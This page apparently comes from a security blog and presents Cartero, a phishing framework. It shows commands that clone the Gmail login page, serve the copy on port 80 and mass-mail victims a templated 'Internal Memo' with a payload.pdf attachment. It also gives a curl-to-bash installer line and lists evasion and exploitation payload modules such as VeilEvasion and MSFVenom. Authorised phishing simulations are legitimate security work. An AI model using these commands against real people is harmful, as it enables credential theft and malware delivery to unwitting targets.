Just a short post to report an interesting phenomenon!Continue reading “Facebook phishing attempt using image share notifications”
With a lot of modules and a good CLI interface
Cartero is a phishing framework with a full featured CLI interface with a modular structure divided into commands that perform independent tasks (i.e. Mailer, Cloner, Listener, AdminConsole, etc…).
Each sub-command can be configured and automated.
The project was born out necessity through of years of engagements with tools that just didn’t do the job. Even though there are many projects out there, we were not able to find a suitable solution that gave us both easy of use and customizability.
The usage is really simple, for example you can clone the Gmail.com interface:
❯❯❯ ./cartero Cloner --url https://gmail.com --path /tmp --webserver gmail_com ❯❯❯ ./cartero Listener --webserver /tmp/gmail_com -p 80 Launching mongodb Puma starting in single mode... * Version 2.8.2 (ruby 2.1.1-p76), codename: Sir Edmund Percival Hillary * Min threads: 4, max threads: 16 * Environment: production * Listening on tcp://0.0.0.0:80 Use Ctrl-C to stop
And once the cloned site is up and running we can simply use the Mailer command to send templated emails to the victims:
❯❯❯ ./cartero Mailer --data victims.json --server gmail_com --subject "Internal Memo" --htmlbody email_html.html --attachment payload.pdf --from "John Doe <[email protected]>" Sending [email protected] Sending [email protected] Sending [email protected]
The installation process is pretty simple, just one command line:
curl -L https://raw.githubusercontent.com/Section9Labs/Cartero/master/data/scripts/setup.sh | bash
that automagically installs Ruby, MongoDB and all dependencies.
Usage: cartero [options]
List of Commands: Cloner, Listener, Twilio, IMessage, GoogleVoice, Servers, MSFRpcd, BeefConsole, AdminWeb, Update, AdminConsole, LinkedIn, Xmpp, WebMailer, Mailer, Templates, DNSServer, LetsEncrypt, Mongo
List of Payloads: SMBRedirect, VeilEvasion, Beef, MSFVenom
Global options: --proxy [HOST:PORT] Sets TCPSocket Proxy server -c, --config [CONFIG_FILE] Provide a different cartero config file -v, --[no-]verbose Run verbosely -p [PORT_1,PORT_2,..,PORT_N], Global Flag to set Mailer and Webserver ports --ports -m, --mongodb [HOST:PORT] Global flag to Set MongoDB bind_ip and port -d, --debug Sets debug flag on/off --editor [EDITOR] Edit Server
Common options: --list-commands Prints list of commands for bash completion --commands-table Prints list of commands details --list-payloads Prints list of payloads for bash completion --payloads-table Prints list of payloads details -h, --help [COMMAND] Show this message --list-options Show list of long available options --list-short-options Show list of short available options --version Shows cartero CLI version